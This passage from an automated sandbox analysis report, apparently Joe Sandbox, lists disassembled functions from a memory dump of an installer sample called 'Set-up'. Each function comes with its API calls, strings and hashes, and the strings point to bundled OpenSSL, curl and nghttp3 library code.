WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 006EE30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 006EE3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006EE3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 006EE3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 006EE41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 006EE44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 006EE563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 006EE571

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: c90ab09840ded261dd554052b16eff44a5eef1efb2ed9ee6246fb4558c26c224
Instruction ID: 1f824baa5c8a8b7023ce75553dc20d6b644bfe45c658cfefc8440a2b1730f78e
Opcode Fuzzy Hash: c90ab09840ded261dd554052b16eff44a5eef1efb2ed9ee6246fb4558c26c224
Instruction Fuzzy Hash: 2B912735201B829FD7219F39CC45BA6BBA6FF85314F184668E556CB3E1E732E940CB50

Function 005CC900 Relevance: 18.4, APIs: 8, Strings: 4, Instructions: 368COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 005CCC95

Part of subcall function 005CCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 005CCEC8
Part of subcall function 005CCDF0: SetLastError.KERNEL32(00000002,00000000,005CCC27,00000004), ref: 005CD109

SetLastError.KERNEL32(00000002), ref: 005CCDD0

Strings

0123456789, xrefs: 005CCC5E, 005CCC8E
0123456789abcdef, xrefs: 005CCA03, 005CCA14, 005CCA9A, 005CCAAB
0123456789ABCDEF, xrefs: 005CCA29, 005CCA3E, 005CCAC3, 005CCAD4
:, xrefs: 005CC9B5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLastmemchr
String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
API String ID: 2208448350-3285806060
Opcode ID: 335d57f9e7f5f64d55422c6b0084366b1164e12246254b049743b796cf105d52
Instruction ID: badf5954ff4c4dc455c426be9b1d055ae4e249fe9c7b378bb577c1050c2f3904
Opcode Fuzzy Hash: 335d57f9e7f5f64d55422c6b0084366b1164e12246254b049743b796cf105d52
Instruction Fuzzy Hash: 13D1B472A083428FD724DEA8C841B6ABFD1BF91304F18492DF99E97281DA749D84D782

Function 006849F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON

Download Yara Rule

Strings

Error in encoding, xrefs: 00685392
cont [ %d ], xrefs: 00684CC9
BAD RECURSION DEPTH, xrefs: 00684A13
prim: , xrefs: 00684B37
(unknown), xrefs: 00684E8D
<ASN1 %d>, xrefs: 00684C67
%5ld:d=%-2d hl=%ld l=%4ld %s, xrefs: 00684B4D
appl [ %d ], xrefs: 00684CD1
cons: , xrefs: 00684B09, 00684B32, 00684B3F
%5ld:d=%-2d hl=%ld l=inf %s, xrefs: 00684B17
priv [ %d ] , xrefs: 00684C3F
%-18s, xrefs: 00684D01
length is greater than %ld, xrefs: 006853BA

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
API String ID: 0-2568808753
Opcode ID: c91085460a59d8bb2883125801c099a285503fc3cebbab7661d9a2945ddb1bc8
Instruction ID: 1077176b14a7c9f7d4b5b794bd3b65afdbef068fe5110a85f137b2aacc1a2a62
Opcode Fuzzy Hash: c91085460a59d8bb2883125801c099a285503fc3cebbab7661d9a2945ddb1bc8
Instruction Fuzzy Hash: C3E10671508302AFD720BF54DC41B6FB7E6AF84745F044A2CFA8A53292FB71E9048B96

Function 0051A960 Relevance: 15.0, APIs: 3, Strings: 6, Instructions: 1493COMMON

Download Yara Rule

Strings

.%d, xrefs: 0051B1D2
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0051ACAF, 0051ADF1
(nil), xrefs: 0051AF85
-, xrefs: 0051AF2B
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0051A9C6, 0051ACB4, 0051ADF6
0, xrefs: 0051AEBE

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-2555271450
Opcode ID: f0ed294f316a245dad984f290798aa084e602eea7e2efa2ae9440c58e98590ac
Instruction ID: 1c63e0dd967b714b2f295513ab7a9f206203420612ca923c1ce6dd7fdbc8dd83
Opcode Fuzzy Hash: f0ed294f316a245dad984f290798aa084e602eea7e2efa2ae9440c58e98590ac
Instruction Fuzzy Hash: 88C28E716083419FE715CF28C4907AABBE2FFC9354F158A2DE8999B351D730ED858B82

Function 00880460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008806A3

Strings

, xrefs: 00881813
, xrefs: 008816D8

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: 8dd6bb979b9886c9fe6c5662be52be3ff30a9da3cd25c3a7b5687550be188a12
Instruction ID: a8541f7880b5156a534224f0e150e7a5f03c2c17827d1b2b2780ed6bf3b16c22
Opcode Fuzzy Hash: 8dd6bb979b9886c9fe6c5662be52be3ff30a9da3cd25c3a7b5687550be188a12
Instruction Fuzzy Hash: 64D28C72A087558FC724DF28C88426AF7E2FFC8314F198A2DE99997351D770A945CF82

Function 007587D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00758A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00758A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00758B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00758B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00758A42, 00758F13

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: 4ba1ad2f1f472d2a2ae6741aad7afdca68798418cfeb1618453a131157f0ac39
Instruction ID: 9d18c57e9ef8208200b7954559a7f22d05d5ff9540dcf5b1e8ba202a2a3be097
Opcode Fuzzy Hash: 4ba1ad2f1f472d2a2ae6741aad7afdca68798418cfeb1618453a131157f0ac39
Instruction Fuzzy Hash: 0D2203725087419FD711CF24C881BABB7E5FF96304F084A1DF89597282EB75E948CBA2

Function 00894780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 008947A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008947C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00894800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00894D16

Strings

xn--, xrefs: 008949D3
H, xrefs: 00894A88

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: f440c346db207c692ed60cad87cc8847971b4ef9dbbe95c6cbfeddfa1049486f
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: A7E1F6716087198BDB18EE28D8C0A2AB7D2FBC4314F1D9A3DE996C7391E774DC468742

Function 0081C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0081C090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0081C0BE

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0081C0CD, 0081C26B
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0081C0D2, 0081C266
assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0081C433
crypto/evp/encode.c, xrefs: 0081C42E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: 4193f17c7bda7a0a1d921feecd406ec5b7dba5fba33ce3ee11bb6c0b6e8d4457
Instruction ID: 75048ebd7a6133a4563337e5df95f7e74cd4bb150f47b4a9582c6ec432e02f38
Opcode Fuzzy Hash: 4193f17c7bda7a0a1d921feecd406ec5b7dba5fba33ce3ee11bb6c0b6e8d4457
Instruction Fuzzy Hash: 17C1F47160C3958FC7159F28C49076ABBE5FF9A304F0989ADE8D5CB382D234E941CB92

Function 00672430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00674DB4
@, xrefs: 00674EA7
ssl/quic/quic_txp.c, xrefs: 00672A29, 00673096, 00673477, 0067357D, 00673FDE, 00674101
@, xrefs: 00674F5D

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: f0377ac9aa204b14b55ccb647d6914c657e01e42fe4b151e6605b1dfb2e6dec6
Instruction ID: 541caac14a91e53b3360cb05ee1cd04b7a972c7ade75220df6baaf49d9792b44
Opcode Fuzzy Hash: f0377ac9aa204b14b55ccb647d6914c657e01e42fe4b151e6605b1dfb2e6dec6
Instruction Fuzzy Hash: 9B53E4716083419FD724CF28C895BABB7E2BF84314F14896DE89D87391EB71E945CB82

Function 00576210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

macdef, xrefs: 0057643B
machine, xrefs: 00576456, 00576656
password, xrefs: 005765C6
login, xrefs: 005764FF
netrc.c, xrefs: 00576243, 00576541, 0057655C, 00576609, 00576627, 005766DD, 005766F7, 0057670E, 0057673F, 0057676B
default, xrefs: 00576471

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 921884f8e5347abda31054fb81ff526f29939fe795f58a0cf702263fa32c2123
Instruction ID: 5dcde86d4ea985aa02f9881be08dbe646553765c5637dc29fd24640d3c801a9a
Opcode Fuzzy Hash: 921884f8e5347abda31054fb81ff526f29939fe795f58a0cf702263fa32c2123
Instruction Fuzzy Hash: 37E147B450C7529BE7109F24A885B2B7FD4BF85708F18882CF88D57282E3B5DD48E792

Function 006800F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00702212,00000000,00000000), ref: 00680109

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

Strings

crypto/asn1/a_object.c, xrefs: 0068012F, 00680151, 0068039E, 006803B4, 006805C3, 006805FC, 0068062C
a2d_ASN1_OBJECT, xrefs: 00680128, 0068014A, 006805BD
1, xrefs: 00680328

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 222c95e069a106aec7d6d6d2419681b279cef0c0f14a4f124439c747d25c3693
Instruction ID: 756ed8ac5df58dac7a9ab176884ddc19ef1b197d86938e495683b1f3f2406eca
Opcode Fuzzy Hash: 222c95e069a106aec7d6d6d2419681b279cef0c0f14a4f124439c747d25c3693
Instruction Fuzzy Hash: CFE15D319083018BE761BF28D84175EB7E2AF91754F048F2DF8D8A7392E770D9498B82

Function 005BE070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,005BC1CE,?,00000003,?), ref: 005BE4EE

Strings

(size_t)(p - buf->last) == len, xrefs: 005BE4E9
